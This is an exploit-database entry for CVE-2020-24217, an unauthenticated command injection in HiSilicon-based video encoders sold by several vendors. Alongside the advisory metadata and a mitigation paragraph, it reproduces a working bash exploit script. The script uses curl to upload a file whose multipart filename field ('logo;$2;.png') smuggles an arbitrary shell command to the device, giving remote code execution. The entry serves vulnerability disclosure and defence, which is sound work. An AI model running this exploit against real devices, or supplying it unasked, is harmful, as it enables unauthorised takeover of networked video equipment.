HiSilicon video encoders - RCE via unauthenticated command injection

vendor:

HiSilicon Video Encoders

by:

Alexei Kojenov

9.8

CVSS

CRITICAL

Command Injection

CWE

Product Name: HiSilicon Video Encoders

Affected Version From: Vendor-specific

Affected Version To: Vendor-specific

Patch Exists: YES

Related CWE: CVE-2020-24217

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

HiSilicon video encoders – RCE via unauthenticated command injection

A vulnerability in HiSilicon video encoders allows an unauthenticated attacker to execute arbitrary commands on the device. This vulnerability affects multiple vendors, including URayTech, J-Tech Digital, and ProVideoInstruments. The vulnerability is caused by insufficient input validation of user-supplied data, which allows an attacker to inject arbitrary commands into the device.

Mitigation:

Vendors should ensure that user-supplied data is properly validated before being used in system commands. Additionally, vendors should ensure that all user-supplied data is properly sanitized and encoded to prevent malicious input.

Source

Exploit-DB raw data:

#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <command>"
  exit 1
fi

printf "executing the command... "
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
  echo "SUCCESS: remote command executed"
else
  echo "ERROR: $?"
fi